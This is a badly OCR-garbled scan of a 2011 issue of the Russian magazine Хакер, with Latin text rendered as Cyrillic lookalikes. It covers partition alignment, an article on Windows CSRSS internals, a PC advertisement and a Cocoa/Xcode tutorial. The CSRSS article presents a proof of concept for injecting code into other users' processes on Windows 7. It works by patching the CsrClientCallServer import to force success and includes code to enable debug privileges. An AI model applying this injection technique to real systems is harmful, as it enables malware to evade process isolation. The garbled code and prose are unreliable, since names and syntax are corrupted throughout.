всех 51 2-байтных секторов на один вперед, что решит проблему с 
первым разделом, но оставитее нерешенной для всех остальных. 
Нам, пользователям І_іпих, ни тот, ни другой вариант не подходит, 
поэтому придется обходиться своими силами. Ксчастью, ничего 
сложного в процессе выравнивания разделов нет, и ниже я покажу, 
какэто правильно сделатьс помощью стандартного сРсМэк. 

Начало первого основного раздела довольно просто расположить в 
64 секторе. Для этого запускаем кіізк с опцией '-и': 

# ксіізк -и /сіеѵ/зсІЪ 

Вводим команду ’п' (новый раздел), далее ' р' (основной раздел), 
затем Т (первый раздел), на вопрос о начале первого сектора 
вводим 64, в качестве последнего сектора вводим желаемый размер 
раздела в секторах (его можно вычислить, разделив размер раздела 
в байтах на 51 2). Записываем таблицу разделов с помощью команды 
V. Далее раздел можно отформатировать и подключить: 

# тккз.ехк4 /сіеѵ/зсіЫ 

# тоипк /сіеѵ/зсіЫ /тпк 

Все остальные основные разделы диска также необходимо выравни- 
вать с помощью выбора начального сектора так, чтобы его номер был 
кратен восьми. Задачу можно упростить, если при создании каждого 
раздела высчитывать номер его последнего сектора так, чтобы его 



Наглая ложь Ѵ\Ю о том, что их диск готов к использова- 
нию «как есть» в любой ОС, за исключением ѴѴіпХР 

номер был кратен восьми, и вычитать единицу. Тогда следующий 
раздел поумолчанию получит правильный номер начального секто- 
ра. 

С расширенными разделами все намного сложнее. Каждый расши- 
ренный раздел может соде ржать до четырех подразделов, начало 
первого из которыхтакже поумолчанию располагается в 63 секторе 
(здесьдело не в оптимизации, введенной в обращение более 20 
летназад, а втом, что расширенный раздел был придуман для 
эмуляции физического диска). Поэтому сначала придется создать 
расширенный раздел с начальным сектором, кратным восьми, а 
затем создавать все его внутренние разделы с начальным сектором 
также кратным восьми. Здесь низкоуровневый сТсІізк становится 
слишком опасным инструментом, поэтому лучше воспользоваться 
программой рагіеб с опцией "--аіідп оріітаі", благодаря которой все 
создаваемые разделы будут располагаться в правильных секторах. 

Выводы 

Да, почти все описанное в статье можно проделать с помощьюудоб- 
ных графических программ, но, как показывает практика, необходи- 
мость в таких инструментах наступает именно в тот момент, когда их 
нетпод рукой. Итогда без теории и четкого осознаниятого, каквсе 
это работает, не обойтись, □с 




1 ГіТН «ТА/НМВСасІв 

І.ІМО Ш10ЕАН8 

ІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІНІ 

8<Н : ЖДѴЫИЗД279 



МІГІОСПІ бог»* Игі«. V «Ысѵс ІѴІІ піггвгткне. 
< Ніпівд I- КР, гшлі ри1Л1*л кі (ГМІПв іОПѵгісг 



МОІ. : Ш01 0Ш& - ООѴ5В 1 и II ІІ8 ! * 

пи іи і гни іімі іі пиши л іи 

РгСкіисі ѵкппіу шііі Ьс ѵаніі іі ніі . Во поЕ с^ѵег 
Ійеі ог соиег і> ог йнаце 4. ап ѵ йгі™ Ьрісі 

ШЫШШІЖХтн юл : 1953525163 
к ОЛТЕ: 24 МОУ 2009 ШС ЛЖ 

Ш ОШ : НДЫННТгСАВ 12Ѵ0С : 0.55А 
■ 0СК:МП7Ѵ4750 : 701640 

I и $ N16»! I*. 617 Ю56 5956 19ЩѲШ4. 6263459 
I Рглйис! а! ТІМІМЛ щш 

I С*иЙяКК-004Сі«ів^ ЛТД Т Д 

I нт - 003 Сідне в Поне НІП І, * ^ 



ХАКЕР 01 (144) 201 1 



► юз 






О том, как ѴѴіпсІоѵѵз 7 помогает 
современным хакерам старыми средствами 



© Существует такая аксиома: чем больше недокументирована какая- 
нибудь часть ѴѴіпсІоѵѵз, тем больше разработчики МісгозоО не хотят, 
чтобы ее использовали разработчики программного обеспечения. 
Причина, как всегда, банальна - недокументированные возможности 
позволяют вытворять с системой жуткие вещи! 



Тем не менее, в среде программистов бытует мнение, что, несмотря 
на полную недокументированность подсистемы ввода-вывода СЗР55, 
ничего интересного она из себя не представляет, как с точки зрения 
прикладного кодинга, так и с точки зрения разработки малвари. Да, 
приходится признать, что даже вирусам и руткитам она неинтересна. 
За исключением, пожалуй, знаменитого червя ІЧітсІа. Хотя, постой, 
еще существует способ детекта скрытых процессов возможностями 
СЗР55... В общем, С5Р55 не так прост и бесполезен, как кажется 
некоторым несознательным гражданам. Положим его на наш опера- 
ционный стол и узнаем, чем же он может быть полезен настоящему 
хакеру. 

Введение 

Подсистема С5Р55 — сііепі/зегѵег гип-ііте зиЬзузСет (клиент- 
серверная подсистема) — это часть исполнительной подсистемы 
ѴѴіпсІоѵѵз, которая отвечает за консольные приложения, создание/ 
удаление потоков и за 16-битную виртуальную среду МЗ-йОЗ. Это 
мы знаем, но, к сожалению, на этом вся документированность С5Р55 
заканчивается. 

Наверное, это один из самых загадочных кирпичиков ѴѴіпсІоѵѵз. И 
это не только загадочный, но и чувствительный кирпичик, так как 
процесс С5Р55.ЕХЕ — единственный, которому присваивается 



эпитет «критичный», и вмешательство в его нормальное исполне- 
ние грозит крахом всей системы. Упомяну такую деталь — на весь 
(!) зоопарк ВЗСЮ’ов, который может сгенерировать ядро ѴѴіпсІоѵѵз, 
только два багчека: 0x00000040 (БАТАЕ_ІІІ\ІНАІ\ЮІ_ЕВ_НАРВ_ 
ЕРРОР) и 0x0000021 А (5ТАТи5_5ѴЗТЕМ_РР0СЕ55_ТЕРМІМАТЕВ) 
происходят при крахе его юзермодных процессов (ѵѵіпіодоп.ехе 
и сзгзз.ехе). Без этих двух процессов ѴѴіпсІоѵѵз существовать не 
может. И самое печальное — во втором случае, если будет уста- 
новлено, что причиной «синего экрана» стал отказ сзгзз.ехе (как 
правило, в результате действия малвари), то это будет фатальный 
случай, приводящий к переустановке системы (или ее аварийному 
восстановлению). 

С5Р55 берет свои настройки не из реестра, как может показаться 
на первый взгляд, а из командной строки, которая выглядит при- 
мерно так: 

%8узЦетКооС%\зузВет32\сзгзз . ехе ОкдесСВігес1:огу=\ 
Шпскжз 8Цагес18есСіоп=1024 , 3 072 , 512 МпсЗомз=Оп 
8иЪ8узСетТуре=Мпс1сжз 8егѵегВІ1=Ъазезгѵ, 1 ЗегѵегВІІ 
=ѵ^іпзгѵ:ІІзег8егѵегБІ1ІпіЦіа1І2аЦіоп, 3 ЗегѵегВІІ =ш_п 
згѵ: СопЗегѵегВІІІпіСіаІігаСіоп, 2 Рго^і1еСопСго1=0^^ 
МахКедиез СТЬгеасЗз = 16 
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1 ѴѴіп32 АРІ І.еѵеІ 

Ц кетеІ32.сІІІ, и$ег32.сІІІ 


1 





Ыаііѵе С$г Іпіегіасе 

• СзгСІіепІСоппесІТоЗегѵег 

• С$гСІіеп1СаІІ5егѵег 

• С$гСе1Ргосе$$ІсІ 

• Сзг ~ 



Ыаііѵе 1-РС АРІ 

• ЫІСоппесіРогГ 

• ЫІСотрІеІеСоппесІРоіі 

• ЫІРериезІѴѴаіІРерІу 

• ЫІВерІуѴѴаіІРеяиезІ 

• КІІВерІуРозІ 

• N1 ~Рог1 



Иерархия АРІ-вызовов подсистем С5К55 и ІРС 

В общем, на мой взгляд, основная задача С8Р88 все-таки 
заключается в своеобразном контроле над созданием и 
уничтожением процессов и потоков. А раз так, то нельзя 
недооценивать те возможности, которые в нем скрыты. 

ІРС, или І-осаІ Ргосесіиге СаІІз 

Перед тем, как углубиться в дебри СзгАрі, давай посмо- 
трим в сторону механизма І_РС, созданного в ѴѴіпсІоѵѵз для 
реализации межпроцессного взаимодействия. Почему 
именно на него? Все дело в том, что С8Р88 реализует 
свой собственный протокол поверх І_РС. І_РС часто назы- 
вают І_осаІ ІпІегРгосезз Соттипісабоп. Я, к сожалению, 
не знаю, как на самом деле расшифровывается І_РС, но 
раз на М80І\І-блогах І_РС зовут І_осаІ Ргосесіиге СаІІз, зна- 
чит, так тому и быть. 

Как уже было сказано выше, ІРС — это недокументиро- 
ванный механизм ѴѴіпсІоѵѵз, предназначенный для взаи- 
модействия между процессами и потоками, основанный 
на приеме/передаче пакетов. Это взаимодействие может 
происходить как целиком в ядре, так и между юзермодны- 
ми компонентами. 

Суть І_РС предельно проста — коммуникация между участ- 
никами взаимодействия (клиентом и сервером) осущест- 
вляется путем передачи блоков данных (так называемых 
сообщений І_РС). Клиентом может быть поток или процесс, 
и исполняться они могут на разных гіпд-уровнях, как в 
ядре (гО), так и простым пользовательским приложением 
(гЗ). 

Основывается он на двух вещах — портах и вну- 
тренних І_РС-структурах (таких как Р0РТ_МЕ88А6Е). 
Логически І_РС состоит из двух действий: кон- 
некта к определенному порту (ШСгеаІеРогІ, 

ІМіСоп пес! Роге І\Ш_із1:епРогІ и т.д.) и передаче данных 
(ЖРециезіѴѴаііРерІуРогІ и др.). 

СзгСІіепІСаІІБегѵег — 
вот где собака зарыта! 

Среди всех используемых СзгАрі-функций наи- 
более часто можно встретить СзгСІіепіСаІІЭегѵег. 



Перекрестные ссылки на нее можно увидеть 
в таких функциях, как кегпе132!СгеаІеРгосе55, 
кегпе132!АЦосСопзоІе, кегпе132!ЕгееСопзо1е, 
изег32!ЕпсІТа5к и десятках других. Если мы взглянем 
на нее под микроскопом ЮА, то увидим, что каждый 
раз, когда вызывается СзгСІіепіСаІІЭегѵег, в стек затал- 
кивается какое-то уникальное число, меняющееся от 
функции К функции: 



.ЦехЦ:77Е9бБ55 РЦЗН 4 

. ЦехЬ : 77Е96Б57 РІІЗН 20225А 



// вот это число 

. РехЦ : 77Е96Б5С МОѴ [ЕВР+ѵаг_7С] , ЕАХ 
РЦЗН О 

ЬЕА ЕАХ, [ЕВР + ѵаг_А4] 
РЦЗН ЕАХ 

САШ СзгСІіепРСаІІЗегѵег 



. РехЦ : 77Е9 6Б5Е 
. РехЦ : 77Е9 6В61 
. РехЦ : 77Е9 6Б67 
. РехЦ : 77Е96Б68 



Это загадочное число — не что иное, как индекс 
указателя специальной функции, определенной в 
библиотеках, используемых подсистемой С8Р55. 

То есть специальная процедура, называемая 
СзгАріРециезіТІпгеасІ, исполняется в контексте отдель- 
ного потока в сзгзз.ехе, ответственного за прием 
запросов от пользовательской подсистемы. Она обра- 
батывает его через соответствующие диспетчерские 
таблицы С8Р88 и возвращает результат. 

Что интересного может дать использование функ- 
ций СзгАрі в интересах программиста? Много чего. 
Например, можно организовать прямой распил консо- 
ли, так как подсистема С8Р88 напрямую отвечает за 
консоль в ѴѴіпсІоѵѵз. 

іпР таіп(іпС агде , сАаг* агдѵ [ ] ) 

{ 

ЫТЗТАТІІЗ ЗРаРиз ; 

СЗК_АРІ_МЗС т; 

СС№ЗОЬЕ_ТІТЪЕ_МЗС *сопзо1еТіШеМез = 

&т. и . СопзоІеТіШе ; 

СЗК_САРТ1ЖЕ_НЕАБЕК * сарРигеВиііег ; 

сопзо1еТіШеМез->Сопзо1еНапс11е = 
СеРСопзоІеНапсІІе ( ) ; 

сопзо1еТіА1еМез->'ГіА1еЬеп=2 60 ; 

сопзо1еТіА1еМез->ТІпісосІе=0 ; 

СарЦигеВиііег = (СЗК_САРТШЕ_НЕАБЕК *) 
СзгАІІосаРеСарЦигеВиііег ( 

1, 

сопзо1еТіЦ1еМез->ТіА1еЪеп) ; 

СзгСарРигеМеззадеВиііег ( 

СарРигеВиііег , 

ШШ, 

сопзо1еТіАІеМез->ТіАІеЬеп, 

(РѴОІБ * ) &сопзо1еТіШеМез->ТіШе) ; 



СзгСІіепРСаІІЗегѵег ( 

(РСЗК_АРІ_МЗС) &ш, 

СарРигеВиііег , 
СЗК_МАКЕ_АРІ_ШМВЕК. ( 

С(ЖЗКѴ_ЗЕКѴЕКВШ_ІШЕХ , 
СОЫЗКѴ_ЕІКЗТ_АРІ_ШМВЕК+3 8) , 
зігеоі (ш) ) ; 

ргіпШ ( "СопзоІеТіШе із : %з\п", 
ш. и . СопзоІеТіШе . ТіВІе) ; 
геВигп 0 ; 






1 НТТР://ѴѴѴѴѴѴ 
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Не ленись читать 
М80Ы — несмотря на 
бытующее 

в определенных кругах 
пренебрежительное 
отношение кданно- 
му сайту, чтение его 
статей позволяет 
устранить до 99% 
ошибок, возникающих 
при использовании 
ѴѴіпАРІ. 




> сіѵсі 

На компакт-дискеты 
найдешь реализацию 
описанных в статье 
приемов на С. 
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К сожалению, рамки статьи не позволяют описать все аспекты 
использования СзгАрі-функций в повседневной жизни программи- 
ста, поэтому сейчас мы перейдем непосредственно к теме сегод- 
няшней статьи. 

Что дальше? 

Итак, что же мы нашли при распиле С5Р55? В смысле, с хакер- 
ской точки зрения. Ни много, ни мало — инжект кода в ѴѴіпсіоѵѵб 7. 
Как ты знаешь, разработчики ѴѴіпсіоѵѵб 7 сильно потрудились над 
безопасностью процессов в системе — теперь просто так выполнить 
СгеаІеРетоІеТЬгеасІ в чужой процесс не удастся. Да, приходится 
признать, что дяденьки из МісгобоЙ постарались на славу, отрубив 
мегакулхацкерам любимый способ инжекта кода. При попытке вызо- 
ва СгеаІеРетоІеТЬгеасІ с хэндлом процесса другого пользователя, 
мы обламываемся, и функция возвращает нам с кодом ошибки 

ЕРР0Р_Ы0Т_ЕМ0ибН_МЕМ0РУ. 

Но ведь и про старуху бывает порнуха :). 

Конечно, существуют в природе способы инжекта с использова- 
нием РШСгеаІеІІзегТЬгеасі (подробнее об этом можно прочитать 
здесь: ЬирУЛогит.датесІесерІіоп.пеіДбгеасІБ/1 7097-5І т ріе- 

), но мы не будем его 

рассматривать; желающие могут поэкспериментировать сами. 

Не зря мы сегодня завели разговор про С5Р55, ведь именно с 
помощью ее возможностей можно очень даже неплохо вернуть 
утраченный біэіііб цио и получить возможность инжекта кода в 
чужие процессы. Концепция нашего РоС проста. Дело в том, что 
успешность вызова СгеаІеРеппоІеТЬгеасІ зависит от системной 
функции СБгСІіепіСаІІЗегѵег, которая фактически обрабатыва- 
ет этот запрос. Она следит за выполнением, но сама удаленный 
поток не создает. Вызов СгеаІеРеппоІеТЬгеасІ сводится к систем- 
ной функции ЖСгеаІеТЬгеасІЕх, которая создаст поток с флагом 
СРЕАТЕ_500РЕЫ0ЕВ, однако дальнейшее развитие ситуации 
будет зависеть от успешности вызова функции подсистемы С5Р55 
— СБгСІіепіСаІІЗегѵег. Ничего интересного в голову не приходит? 

:) Все, что нам нужно — это сделать так, чтобы при создании уда- 
ленного потока СзгСІіепіСаІАЗегѵег всегда возвращала успешное 
значение. И будет тебе счастье. Смотрим на дизассемблированную 
кегпеІЬазе.сІЦ (это аналог кегпе132.сІІІ в ѴѴіпсіоѵѵб 7, если ты не знал): 



кегпеІЬазе.сІІІ 

. кехк : 7597ВБ24 
. кехк : 7597ВБ26 
. СехВ : 7597ВБ2В 
. СехВ : 7597ВБ2С 
. СехС : 7597ВБ32 
. СехС : 7597ВБЗЗ 



. СехВ : 7597ВБ39 
. СехВ : 7597ВБЗЕ 
. СехС : 7597ВБ45 
. СехС : 7597ВБ4В 



РІІЗН ОС 
РІІЗН 10001 
РІІЗН ЕВХ 

ЬЕА ЕАХ , ШОИ) РТК 33: [ЕВР-210] 

РІІЗН ЕАХ 

САШ ЫЕАВ ШОКБ РТК 

БЗ : [<&пВсІ11 . СзгС1іепБСа113егѵег>] 
; пВсіІІ . СзгСІіепБСаІІЗегѵег 
МОѴ ЕАХ, БѴГОКБ РТК 33: [ЕВР-ІЕО ] 

МОѴ БѴГОКБ РТК 33: [ЕВР-218] , ЕАХ 
СМР БѴГОКБ РТК 33: [ЕВР-218] , ЕВХ 
ВЪ КЕКБЕЬВА. 75999564 




*( БѴГОКБ *)(( ВУТЕ * ) Агді + 0x2 0 ) = 0; 

геіигп 0; 



БѴГОКБ ІтрогБАсІсІгезз ; 

БѴГОКБ ОгідіпаІСзгСІіепБСаІІЗегѵег , ОІсЗРгоЕесЦ; 

ІтрогБАсІсІгезз = СеЕІтрогЕА<і<ігеззРготІаВ ( 
СеБМосІиІеНапсІІе ( " кегпеІЬазе . сЗІІ " ) , 

" СзгСІіепкСаІІЗегѵег " ) ; 

ѴігкиаІРгокеск ( ( ѴОІБ *) ІтрогкАсІсІгезз , 
зігеоі (БѴГОКБ) , 

РАСЕ_ЕХЕСІІТЕ_КЕАБѴ\ГКІ ТЕ , 

&01сІРгоЦесЦ ) ; 

ОгідіпаІСзгСІіепБСаІІЗегѵег = 

* (БѴГОКБ*) ІтрогБАсІсІгезз ; 

* ( БѴГОКБ* ) ІтрогБАсІсІгезз = 

(БѴГОКБ) БеѵГОзгСІіепкСаІІЗегѵег ; 



И все! Раз, раз, раз — и... мы в дамках! Теперь наша новая функ- 
ция СБгСІіепіСа ІІВегѵег будет возвращать «зиссезз», что, соб- 
ственно, и нужно для успешного запуска СгеаІеРеппоІеТЬгеасІ. 
Кстати, такой подход довольно оригинален: вместо того, чтобы 
искать способы выполнения своего кода, писать (или покупать) 
Обау-эксплойты, повышающие права, искать новые уязвимости 
в системе и т.д., иногда бывает просто нужно переписать один 
байт. Самое главное — знать, где :). 

В заключение только добавлю, что для успешного выполнения 
такого кода нужны дебаг-привилегии, которые подрубаются при- 
мерно таким образом: 

ипзідпесі іопд СеББеЪидРгіѵіІедез ( ) 

{ 

ТОКЕБ_РКІѴІЬЕСЕЗ ВокепРгѵІдз ; 

іі ( ! ОрепРгосеззТокеп (СеВСиггепкРгосезз ( ) , 
ТОКЕБ_АБіЛІЗТ_РКІѴІЬЕОЕ8 , &ЬТокеп) ) 
гекигп еггог ; 

іі ( ! БоокирРгіѵіІедеѴаІие (ШЬБ, ЗЕ_БЕВІІС_БАМЕ , 
&іокепРгѵ1дз . Ргіѵііедез [ 0 ] . Ьиісі) ) 
геіигп еггог; 

іокепРгѵІдз . РгіѵіІедеСоипі = 1; 

ЦокепРгѵІдз . Ргіѵііедез [ 0 ] .АіігіЬиіез = 
ЗЕ_РКІѴІЕЕСЕ_ЕЫАВЬЕБ ; 

іі ( ! АсІзизіТокепРгіѵіІедез (НТокеп, ЕАЬЗЕ , 
&іокепРгѵ1дз , 0, ЖІББ, ШІЬБ) ) 

{ 

геіигп еггог; 

} 



Нам нужно найти в памяти кегпеІЬазе. 611, просканировать таблицу 
импорта, найти адрес импортируемой функции СБгСІіепіСаІіЗегѵег 
и подменить его новым указателем на заранее подготовленную 
функцию СзгСІіепіСаІІЗегѵег, которая всегда будет возвращать 
«успех». Сделать это легко. Смотрим: 

ІЛіСЖС БеѵГОзгСІіепіСаІІЗегѵег ( 

РѴОІБ Агді, 

РѴОІБ Агд2 , 

ІІЬОШ АгдЗ , 

ІІЬОШ Агд4 ) 

{ 



СІозеНапсІІе ( НТокеп ) ; 
геіигп зиссезз; 

} 

Заключение 

Вот и все, что я хотел донести до тебя. Не так страшна ѴѴіпсіоѵѵб 7, 
как ее раскрашивают. Код, который делает все вышеизложенное, 
как всегда, ищи на диске. Удачного компилирования, и да пребу- 
дет с тобой Сила! 

Р.5. Осторожнее в экспериментах с С5Р55! А то систему 
жалко :). ПС 



► 106 



ХАКЕР 01 (144) 201 1 





ШІІК.НОМЕ 902 



Собрать мощный компьютер, который мог бы выполнять абсолютно любые задачи, и при 
этом позволял бы гонять в самые современные игры - мечта каждого. Но тут сразу возникает 
множество проблем, в основном — выбор подходящих комплектующих. На рынке масса 
новинок, но девайсы устаревают быстрее, чем ты успеваешь накопить денег. Что же делать? 
Отказаться от своей идеи? Конечно же, нет! Просто нужно часть проблем переложить на чужие 
плечи. То есть приобрести готовый комп самой мощной конфигурации. Компьютер ѴѴЕХІ.ЕР. 
НОМЕ 902 обладает современнейшей начинкой, которая предоставит тебе неограниченные 
возможности в играх и мультимедийных приложениях. 



Железо 

Компьютер ѴѴЕХБЕР.НОМЕ 902 создан на базе мощного четырех- 
ядерного процессора Іпіеі® Соге™ і 7-970 с частотой 3,2 ГГц и 
кэш-памятью 12 МБ. СРІІ имеет встроенный контроллер памяти и 
поддерживает технологию ТигЬо Воозі, автоматически разгоняю- 
щую его под нагрузкой. Согласись, круто: стоит тебе запустить 
игру или какое-то другое ресурсоемкое приложение, как процес- 
сор автоматически увеличивает свою частоту. 

За игровые возможности в ѴѴЕХБЕР.НОМЕ 902 отвечает видео- 
карта ѲеЕогсе 6ТХ 460, основанная на новейшей архитектуре 
«Еегппі». Благодаря высокой производительности в режиме 
БігесіХ 1 1 тесселяции процессор 6ТХ 460 обеспечивает идеально 
четкую графику без ограничения скорости, а поддержка техноло- 
гий ІЧѴЮІА ЗБ Ѵізіоп™, РЬузХ® и СІЮА™ позволяет визуализи- 
ровать все самые потрясающие эффекты, на которые способны 
компьютерные игры. 

ѴѴЕХБЕР.НОМЕ 902 оснащен трехканальной оперативной памятью 
объемом ни много ни мало 12 Гб. Благодаря этому работа с каж- 
дым из установленных модулей памяти осуществляется в парал- 
лельном режиме. Пусть технология и не дает теоретического уве- 
личения пропускной способности втрое, но, тем не менее, вносит 
ощутимый вклад в общую производительность системы. Также, 



учитывая объем установленной памяти, можно смело выключать 
своп и наслаждаться производительностью. 

Современный компьютер не может обойтись без надежного пита- 
ния. Именно поэтому ѴѴЕХБЕР. НОМЕ 902 оснащен блоком пита- 
ния мощностью 700 Вт, который обеспечивает стабильную работу 
даже в моменты максимальной загрузки. 

Софт 

На всех компьютерах ѴѴЕХБЕР.НОМЕ 902 предустановлена 
операционная система ѴѴіпсІоѵѵз® 7 Домашняя расширенная. 
Использование именно 64-битной версии не случайно: благодаря 
этому удается задействовать все 12 Гб установленной в компью- 
тере памяти. Помимо ОС, дополнительно предустановлена три- 
алка офисного пакета Місгозоіі® 0№се и бесплатный антивирус 
Місгозоіі® Зесигііу Еззепііаіз. Также на компьютере инсталлиро- 
вана популярная сетевая игра ѴѴогІсІ оІ'Тапкз, и покупатели ком- 
пьютера получают 4099 виртуальных денежных единиц в этой игре. 

Комплектация 

Компьютер поставляется с комплектом необходимых драйверов, 
инструкцией на русском языке, фирменными клавиатурой и мышью. 

Подробнее о продукте: ѵѵѵѵѵѵ.ѵѵехіег.ги 
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Сосіе 

Если ты читал предыдущую статью или уже пробовал кодить под 
макось, то наверняка познакомился с ХСосІе, стандартной средой 
разработки под Мае 05 X от Арріе. Эта среда содержит все, что 
тебе может потребоваться для кодинга: редактор, компилятор, 
отладчик и т.д. Для создания графического интерфейса там есть 
специальная тулза под названием Іпіегіасе ВиіШег. 

Да, именно так — до ХСобе 4 Іпіегіасе ВиіШег существовал в виде 
отдельного приложения, что было довольно-таки неудобно, поэтому 
в четвертой версии ХСобе Арріе интегрировала Іпіегіасе ВиіШег 
в свою ЮЕ, и теперь ковать железо можно, не отходя от кассы. К 
сожалению, ХСобе 4 на данный момент (на момент сдачи статьи, 
т.е. конец сентября, — прим, ред.) находится в фазе тестирования, 



и в свободном доступе ее нет, поэтому все сказанное ниже отно- 
сится к ХСобе и Іпіегіасе ВиіШег третьей версии. Давай для начала 
попробуем создать простое 6111-приложение под макось с помощью 
всего этого хозяйства. 

Сначала был проект 

Каждый программный продукт в современном мире начинается с 
создания проекта для той среды, в которой он будет дальше раз- 
виваться. Проект — это, как ты знаешь, собрание разнообразных 
элементов, которые используются для построения приложения: 
исходных файлов, файлов с описанием пользовательского интер- 
фейса, звуков, изображений, ссылок на используемые фреймворки и 
библиотеки и т.д., и т.п. 



© В прошлый раз ты познакомился с созданием простых консольных 
приложений для Мае 03 X с помощью языка Оіцесііѵе-С и фреймворка 
Сосоа. Но, конечно, гораздо лучше иметь в своих приложениях 
полноценный графический интерфейс. В этот раз мы поговорим 
о создании 6Ш-приложений с помощью все тех же Сосоа и ОЬіесІіѵе-С. 



■ ■ Всеволод Захаров зеѵаІЭѵіпдгасІ.ги 



6111 
И «КАКАО» 

Создаем оконные приложения для Мае 03 X 
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СопИпалсІ ипе ШШГу 
Оупатк иьгдгу 
ГгагмѵиПі 
/оѵя 

КетсІ Ехю»іііап 
&1зп4аг4 Адріе Р(ид . 
Яаііс ІдЬгагу 









йсзсіірііоп ТМ4 рго;е« ЬиіШі а Сесоа-Ьангі эрріісаііоп лгтсп іа 
0іа«ЙѴ*-С 



С Сапсе) " ) Г СНоо5е ^ 



Создаем проект Сосоа 




ЛЛаіпМепи.хіЬ в Іпіегіасе Виіісіег 



Самый распространенный тип программного продукта, который 
создается с помощью ХСосІе — это, конечно, приложения. Но при- 
ложения — не единственное, что ты можешь создать с помощью 
этой ЮЕ, Можно собрать, например, соттапсі-ііпе тулзу, фрейм- 
ворк, плагины, библиотеки и расширения ядра — кехЕы, а также 
приложения для і 05. 

Попробуем проследить создание приложения в ХСобе от начала и до 
конца. Первое, что нам потребуется — это, как ты уже догадался, соз- 
дать проект. 

Для этого запусти ХСобе (если в твоей системе ХСобе не установлена, 
ты можешь безвозмездно скачать ее с сайта Арріе). 

Для того, чтобы создать новый проект, идем в главное меню «Рііе -» 
ІМеѵѵ Ргоіесі». Как видишь, здесь таится множество различных типов 
проектов. Нам потребуется Сосоа Арріісаііоп — оконное приложение, 
использующее фреймворк Сосоа. 

После того, как ты выберешь шаблон для проекта и место его располо- 
жения, ХСобе создаст файлы проекта и даже напишет за тебя пару 
строчек кода. 

Вот ОНИ: 

Точка входа нашего приложения 

#ішрогС <Сосоа/Сосоа.Ъ> 

іпС шаіп(іпС агдс, сЬаг * агдѵ[]) 

{ 

геСигп ЫЗАррІісСіоп (агдс , (сопзС сГіаг**) агдѵ) ; 

} 

Нам здесь интересен вызов функции ІЧЗАррІісаІіоп. После передачи 
управления этой функции приложение входит в цикл обработки сооб- 
щений от системы. Такое «пассивное» поведение тулзы (ожидание 
оповещения от системы) — стандарт для современных многозадачных 
систем. 

Если ты попробуешь собрать и запустить этот проект (Виіісі -» ВиіШ апб 
Со), то увидишь пустое окошко. Откуда оно взялось? Ведь никакого 
кода для его создания мы не писали? Посмотри на файлы нашего про- 
екта. 

Среди них в смарт-группе N I В Еііез (все файлы приложения разде- 
лены на так называемые смарт-группы, а N I В Еііез — это файлы того 
самого Іпіегіъсе ВиіШег’а) есть МаіпМепи.хіЬ. Открываем его двойным 
кликом и попадаем в ІпІеНасе Виіісіег, где видим то самое окошко и 
еще главное меню нашего приложения, которое при запуске в Мае 05 
X находится вверху экрана. 

ОК. Теперь поработаем немного в ІВ и накидаем на эту форму контро- 
лов. 



Строим интерфейс 

Давай разберемся, как изменить внешний вид главного окна нашей 
программы. Идем в «Тооіз -> ЕіЬгагу» (заметь, что теперь главное меню 
изменилось, так как мы находимся не в ХСобе, а в ІпІегТасе Виіібег’е) 
и видим всевозможные контролы, которые ты можешь разместить на 
своей форме простым бгад-апб-бгором. Я кину на окно три текстовых 
поля, пару статических текстовых полей и одну кнопку. Сделаем простой 
калькулятор, который при нажатии на кнопку складывает значения из 
двух текстовых полей и выводит результат в третьем. Надо же с чего-то 
начинать :). 

Для настройки контролов используется «инспектор объектов» (Тооіз -» 
Іпзресіог). В его окошке отображаются свойства выделенного контрола, 
и их можно редактировать. Так с помощью инспектора я задал тайтл 
кнопки и окна. 

Ну, хорошо. Интерфейс у нас есть, и если мы соберем и запустим про- 
ект, то увидим на экране форму такой, какой мы ее создали с помощью 
ІпІеіТасе Виіісіег’а. Ну а как же логика работы нашего приложения? Как 
создать обработчики для событий, приходящих от контролов, и изменять 
внешний вид нашего приложения в коде? А вот тут-то и начинается 
самое интересное... Нам нужно интегрировать наш интерфейс в при- 
ложение. 

Для этого создадим класс- контроллер окна. Этот класс будет содержать 
обработчики сообщений от контролов формы и изменять их вид. Идем 
опять в ХСобе (не забыл, что мы все это время работали в ІпіеНасе 
Виіісіег’е?) и там создаем класс с именем АррСопгоІІег (Рііе -» ІМеѵѵ 
Рііе -» Сосоа -» О^'есііѵе-С сіазз). ХСобе создаст для нас два файла 
АррСопІгоІІег.Ь и АррСопІгоІІег.т с интерфейсом и реализацией класса- 
контроллера соответственно. Есть одна проблемка — Іпіеііасе Виіісіег о 
нашем классе АррСопІгоІІег ничего не знает, а мы ведь должны будем 
привязать объекты интерфейса к полям и методам АррСопІгоІІег’а. 
Перетаскиваем АррСопІгоІІег.Ь на главное окно Іпіегіъ се Виіісіег. Теперь 
порядок. Но чего-то все-таки не хватает. Ага! Класс есть, а объектов 
этого класса нет ни одного. Идем в «ІпІеНасе Виіісіег -» Тооіз -» ЫЬгагу 
-» 0Ь)ес1» и перетаскиваем объект с палитры на главное окно билдера. 

С помощью инспектора сообщаем билдеру, что это — объект класса 
АррСопІгоІІег 

Теперь вся необходимая информация есть в МаіпМепи.хіЬ, и при старте 
нашего приложения среда выполнения, загрузив этот файл, содержа- 
щий описание интерфейса, создаст объект нашего класса и настроит его 
нужным образом. 

Наконец-то кодинг 

После того, как с формошлепством покончено, настало время написать 
немного кода, который будет отвечать за поведение нашего приложения. 
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Делаем морду из стандартных контролов 



«Для того, чтобы 
оірендерить собственную 
20-сцену, нам потребуется 
создать свой класс-вид» 



Код класса АррСопігоІІег 

// Интерфейс класса 
// Включаем Сосоа. к 
#л_трогк <Сосоа/Сосоа . Ь> 

ЦіпСегііасе АррСопЪгоІІег : ИЗОЬ^есВ 
{ 

/ / Ссылки на три текстовых поля . 

// Значение будет присвоено 
/ / средой выполнения . 

ІВОибІеб ИЗТехДРіеІсі * РігзбИишЬег ; 

ІВОибІеб ИЗТехбРіеІб * ЗесопсШшпЪег ; 

ІВОибІеб ИЗТехбРіеІб * Кезиіб; 

} 

// Обработчик клика на единственной кнопке 
/ / нашего приложения 

- (ІВАсбіоп) ЬиббопСІіск: (іб) зепбег; 

@епб 

// Реализация класса 
#ішрогб «АррСопбгоІІег .Ъ» 

@ітр1ешепбабіоп АррСопбгоІІег 

// Обработчик клика очень прост 

- (ІВАсбіоп) ЬиббопСІіск: (іб) зепбег 
{ 

// Берем значения из двух текстовых полей и 
// присваиваем их сумму третьему 
[Кезиіб зебІпДѴаІие: 

[РігзбИигпЬег іпРѴаІие] + 

[ЗесопбИишЬег іпбѴаІие] ] ; 

} 

@епб 

